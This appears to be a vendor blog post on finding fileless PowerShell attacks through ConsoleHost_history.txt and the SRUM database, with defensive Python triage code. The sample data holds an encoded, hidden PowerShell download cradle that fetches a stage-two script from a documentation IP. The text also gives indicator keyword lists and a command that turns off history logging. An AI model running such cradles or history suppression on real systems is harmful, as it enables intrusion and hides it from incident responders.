The era of adversaries dropping noisy, easily signatured malware executables onto a victim’s hard drive is largely over. Modern threat actors—ranging from state-sponsored Advanced Persistent Threats (APTs) to sophisticated ransomware syndicates—have evolved to evade traditional Endpoint Detection and Response (EDR) platforms by utilizing “Living off the Land” (LotL) techniques and fileless malware architectures.
EDR telemetry is built around what happens on the endpoint: process creation, file writes, module loads, and the signatures and reputation of binaries that land on disk. That puts it at a structural disadvantage when the attacker's tooling is legitimate, pre-installed, Microsoft-signed administrative software and nothing novel is ever written to the volume. To detect and eradicate these adversaries definitively, threat hunters and incident responders must look beyond live memory monitoring and interrogate the operating system's own accounting mechanisms, the records Windows keeps for its own purposes rather than for security.
TensorGuard automates this rigorous process, effortlessly parsing artifacts like PowerShell forensics and the System Resource Usage Monitor (SRUM) at fleet scale to expose what traditional security controls miss.
The Invisible Attacker: Bypassing Live Telemetry
Fileless malware detection is notoriously difficult because the malicious payload resides almost entirely within volatile memory (RAM). Attackers leverage tools like Windows Management Instrumentation (WMI), Registry keys, or scheduled tasks to maintain persistence and execute code without ever creating a traditional file on the NTFS volume.
Similarly, in a Living off the Land attack, adversaries abuse native Windows binaries such as powershell.exe, certutil.exe, or bitsadmin.exe to download payloads, move laterally, or exfiltrate data. Because these binaries are signed by Microsoft and are required for legitimate IT administration, EDR platforms cannot simply block their execution. The security platform is forced to judge the context of each execution, and attackers actively subvert that judgement with heavy script obfuscation and memory injection.
If an attacker suppresses the live EDR alert, tampers with the sensor, or runs the script before an EDR agent is deployed, the activity is invisible to real-time monitoring. The operating system, however, still keeps records of its own, and those records outlive the attacker's session.
Decoding ConsoleHost_history.txt: The PowerShell Confession
PowerShell is the weapon of choice for modern adversaries because it exposes the .NET Framework, and through it the Windows API, from an interpreter that ships on every Windows host. Attackers obfuscate their scripts to evade Anti-Malware Scan Interface (AMSI) scanning at execution time, but the console input that launched those scripts is often preserved on disk.
By default, the PSReadLine module that ships with Windows PowerShell 5.1 and PowerShell 7 appends every command typed into an interactive console to a per-user history file, %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt (that is, C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt). The file is written incrementally as each command is entered, so it survives a console that is closed abruptly, and it is a goldmine for threat hunters. Three limits matter in practice: it records only interactive console input, not scripts run from files, commands passed on the command line with -Command or -EncodedCommand, or remoting sessions; recent PSReadLine versions keep lines that look like they contain secrets (for example a string containing "password" or "token") in memory only; and an attacker can disable it with Set-PSReadLineOption -HistorySaveStyle SaveNothing or delete the file outright, which is itself a finding. Check the file under every profile on the host, including local administrator and service accounts the attacker may have used.
The Value of PowerShell Forensics
- Exposing the Attack Chain: Unlike fragmented Event Logs, ConsoleHost_history.txt provides a literal, sequential script of the attacker's activities. You can read exactly what the adversary typed, in order, without timestamps but with the full command text intact.
- Uncovering Lateral Movement: Investigators can identify specific cmdlets used for reconnaissance (e.g., Get-ADUser) and lateral movement (e.g., Enter-PSSession or Invoke-Command), mapping the trajectory of the breach across the domain. The target names passed to -ComputerName are the next hosts to pull history from.
- De-obfuscating Intent: Even if an attacker launches an encoded payload (e.g., powershell -enc <Base64>) from the console, the launch string itself is captured, and because -EncodedCommand is Base64 of the UTF-16LE command text, analysts can decode the payload post-mortem and determine the adversary's objective. If the same command was launched from cmd.exe, WMI, or a scheduled task instead, it will not be in this file; the command line is then recoverable from Security event 4688 (with command-line auditing enabled) and the decoded script from PowerShell Script Block Logging (event 4104).
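As an added example (not TensorGuard's code), the following triage does what the list above describes over a PSReadLine history file: it locates the per-user history files, recovers -EncodedCommand payloads by Base64-decoding them as UTF-16LE, and tags each line with the indicator categories it matches, inspecting the decoded payload as well as the typed text. The indicator lists, the sample history, and the payload are constructed for the example and are not taken from any real host.

```python
import base64
import glob
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Default PSReadLine history location, one file per user profile.
HISTORY_GLOB = (r"C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell"
                r"\PSReadLine\ConsoleHost_history.txt")

# powershell.exe accepts -EncodedCommand and its prefixes (-e, -ec, -enc, ...);
# the argument is Base64 of the UTF-16LE command text.
ENCODED_ARG = re.compile(r"-(?:e|ec|en\w*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Indicator substrings grouped by what they usually mean in an intrusion (assumed lists).
INDICATORS = {
    "download-cradle":  ["downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "net.webclient"],
    "obfuscation":      ["invoke-expression", "iex ", "frombase64string", "-nop", "-w hidden",
                         "-windowstyle hidden", "bypass"],
    "recon":            ["get-aduser", "get-adcomputer", "net user", "net group", "whoami", "nltest"],
    "lateral-movement": ["enter-pssession", "invoke-command", "new-pssession", "wmic ", "psexec"],
}


@dataclass
class Finding:
    line_no: int
    command: str
    categories: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(command: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none or it is not valid."""
    m = ENCODED_ARG.search(command)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # truncated or edited history line; the raw command is still reported


def triage_history(lines) -> List[Finding]:
    """Scan history lines in order; an encoded command counts as an indicator on its own."""
    findings = []
    for no, line in enumerate(lines, start=1):
        cmd = line.rstrip("\r\n")
        if not cmd.strip():
            continue
        decoded = decode_encoded_command(cmd)
        haystack = (cmd + " " + (decoded or "")).lower()
        cats = [c for c, needles in INDICATORS.items() if any(n in haystack for n in needles)]
        if decoded is not None and "obfuscation" not in cats:
            cats.append("obfuscation")
        if cats:
            findings.append(Finding(no, cmd, cats, decoded))
    return findings


def triage_files(pattern: str = HISTORY_GLOB) -> dict:
    """Run the triage over every profile's history file on a live host or mounted image."""
    results = {}
    for path in glob.glob(pattern):
        with open(path, encoding="utf-8", errors="replace") as fh:
            results[path] = triage_history(fh)
    return results


# Constructed sample history so the example runs offline; the URL is a documentation address.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/stage2.ps1')"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_HISTORY = [
    "Get-ChildItem C:\\Users",
    "whoami /all",
    "Get-ADUser -Filter * -Properties memberOf | Select Name, memberOf",
    f"powershell -nop -w hidden -enc {SAMPLE_B64}",
    "Enter-PSSession -ComputerName FS01 -Credential $cred",
    "Get-Date",
]

if __name__ == "__main__":
    for f in triage_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {', '.join(f.categories)}")
        print(f"    typed:   {f.command[:80]}")
        if f.decoded:
            print(f"    decoded: {f.decoded}")
```

Run against a mounted image by pointing triage_files at the image's Users directory; the line numbers give the order of the attacker's actions even though the file carries no timestamps.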
TensorGuard automatically extracts and analyzes the PS History artifact across thousands of endpoints simultaneously. Instead of manually querying individual hosts, threat hunters can ask TensorGuard’s Evie Intelligence Engine to identify any instances of obfuscated PowerShell execution across the entire fleet in seconds.
Tracking Network Usage with SRUM: Bypassing PCAP
If fileless malware successfully hides in memory and evades file-system detection, it still has a fundamental weakness: it must communicate. Whether it is beaconing to a Command and Control (C2) server or exfiltrating compressed archives, the malware must generate outbound network traffic.
Traditionally, detecting anomalous network traffic required continuous full packet capture (PCAP). Retaining PCAP for an entire enterprise is prohibitively expensive, so the data is usually overwritten within days. Worse, network-side telemetry only sees the host's IP address: if an attacker injects a thread into a benign process such as svchost.exe or explorer.exe, a flow record or firewall log attributes the traffic to a Windows host doing ordinary Windows things, and even a host-based sensor attributes it to the legitimate process image, masking the intrusion.
This is where SRUM forensic analysis becomes the ultimate trump card.
The System Resource Usage Monitor (SRUM), present since Windows 8, tracks resource consumption per application and per user for the operating system's own purposes (it is what feeds the App history tab in Task Manager). Its data lives in an Extensible Storage Engine (ESE) database at C:\Windows\System32\sru\SRUDB.dat. Among its tables, the Network Data Usage provider records, for each hour, which application image and which user SID sent and received how many bytes over which network interface; sibling tables cover CPU time, disk I/O, and energy use. Two practical caveats: the newest data is buffered in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SRUM\Extensions and flushed to SRUDB.dat roughly hourly and at clean shutdown, so on a live host the last hour may not yet be in the database; and the file is locked while Windows runs, so acquire it with a raw-disk or Volume Shadow Copy read.
Crucially, SRUM retains this hourly, per-application data for a rolling window of roughly 60 days.
Attributing the Unattributable
By automating the parsing of the SRUM database, TensorGuard allows threat hunters to retroactively analyze up to 60 days of per-process network activity without a single byte of PCAP. If a supposedly benign instance of notepad.exe or an obscure system service generated gigabytes of outbound traffic over Wi-Fi three weeks ago, TensorGuard's AI engine flags the anomaly and attributes the traffic to the hijacked process: SRUM accounts bytes to the process image that owned the connection, so injected code shows up under its host process rather than disappearing into the operating system's background noise.
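The attribution logic described above, as an added example that is not TensorGuard's code: it takes Network Data Usage rows that have already been extracted from SRUDB.dat and resolved through SruDbIdMapTable (extraction itself needs an ESE parser such as libesedb, so the rows here are constructed), summarizes bytes per application and user, and flags two patterns that exfiltration and C2 produce but browsing does not: upload-heavy applications and images running from user-writable paths. The thresholds, the path allowlist, and the sample rows are assumptions for illustration.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# SRUM's Network Data Usage table ({973F5D5C-1D90-4944-BE8E-24B94231A174} in SRUDB.dat)
# holds one row per hour per (AppId, UserId, InterfaceLuid) with BytesSent/BytesRecvd.
# AppId and UserId are indexes into SruDbIdMapTable; the rows below are assumed to be
# already resolved to an image path and a SID.


@dataclass(frozen=True)
class NetUsageRow:
    timestamp: datetime     # hour bucket the bytes were accounted to
    app: str                # resolved AppId: process image path
    user_sid: str           # resolved UserId
    interface_luid: int
    bytes_sent: int
    bytes_recvd: int


@dataclass
class AppSummary:
    app: str
    user_sid: str
    sent: int = 0
    recvd: int = 0
    hours: int = 0          # number of hourly rows, i.e. hours with any traffic
    first_seen: Optional[datetime] = None
    last_seen: Optional[datetime] = None


def summarize(rows: List[NetUsageRow]) -> Dict[Tuple[str, str], AppSummary]:
    """Aggregate hourly rows into one summary per (image path, user SID)."""
    out: Dict[Tuple[str, str], AppSummary] = {}
    for r in rows:
        s = out.setdefault((r.app, r.user_sid), AppSummary(r.app, r.user_sid))
        s.sent += r.bytes_sent
        s.recvd += r.bytes_recvd
        s.hours += 1
        if s.first_seen is None or r.timestamp < s.first_seen:
            s.first_seen = r.timestamp
        if s.last_seen is None or r.timestamp > s.last_seen:
            s.last_seen = r.timestamp
    return out


# Assumed allowlist of install locations; anything else is treated as user-writable.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MB = 1024 * 1024


def flag_egress(summaries, floor_bytes=100 * MB, upload_ratio=5.0, untrusted_floor=1 * MB):
    """Rule 1 (upload-heavy): sent >= floor and sent > ratio * received.
    Rule 2 (untrusted-path): an image outside the allowlist moved more than untrusted_floor bytes.
    Returns (summary, reasons) pairs, largest sender first."""
    flagged = []
    for s in summaries.values():
        reasons = []
        if s.sent >= floor_bytes and s.sent > upload_ratio * max(s.recvd, 1):
            reasons.append("upload-heavy")
        if not s.app.lower().startswith(TRUSTED_PREFIXES) and (s.sent + s.recvd) >= untrusted_floor:
            reasons.append("untrusted-path")
        if reasons:
            flagged.append((s, reasons))
    return sorted(flagged, key=lambda pair: pair[0].sent, reverse=True)


# Constructed sample: hourly rows for four images under one user SID (not from a real host).
T0 = datetime(2024, 3, 1, 9, 0)
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
LUID = 1689399632855040  # assumed Wi-Fi interface LUID


def hourly(app, hours, sent, recvd, start=T0):
    return [NetUsageRow(start + timedelta(hours=h), app, SID, LUID, sent, recvd) for h in range(hours)]


SAMPLE_ROWS = (
    hourly(r"C:\Program Files\Google\Chrome\Application\chrome.exe", 40, 2 * MB, 60 * MB)
    + hourly(r"C:\Windows\System32\svchost.exe", 200, 1 * MB, 8 * MB)
    + hourly(r"C:\Windows\System32\notepad.exe", 3, 900 * MB, 1 * MB, start=T0 - timedelta(days=21))
    + hourly(r"C:\Users\bob\AppData\Local\Temp\7za.exe", 1, 600 * MB, 0)
)

if __name__ == "__main__":
    for s, reasons in flag_egress(summarize(SAMPLE_ROWS)):
        print(f"{s.app}\n    user={s.user_sid} sent={s.sent // MB} MB recvd={s.recvd // MB} MB "
              f"hours={s.hours} window={s.first_seen:%Y-%m-%d %H:%M}..{s.last_seen:%Y-%m-%d %H:%M} "
              f"reasons={reasons}")
```

Chrome and svchost are download-heavy and installed in trusted paths, so neither rule fires; notepad.exe trips the upload rule three weeks before the other activity, and the archiver in a Temp directory trips both. The first_seen and last_seen window is what lets you line the SRUM hit up against the PowerShell history and event logs from the same hours.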
Automating the Hunt
Manually extracting and deciphering SRUDB.dat databases and scattered PowerShell histories across an enterprise is not feasible during a fast-moving incident response engagement.
TensorGuard operationalizes these deep forensic artifacts. By continuously sweeping endpoints and synthesizing SRUM network attribution with PowerShell execution logs, TensorGuard strips away the invisibility cloak of fileless malware and LotL attacks. Threat hunters are provided with an evidence-backed, fully correlated timeline of adversary activity, fundamentally shifting the balance of power back to the defense.

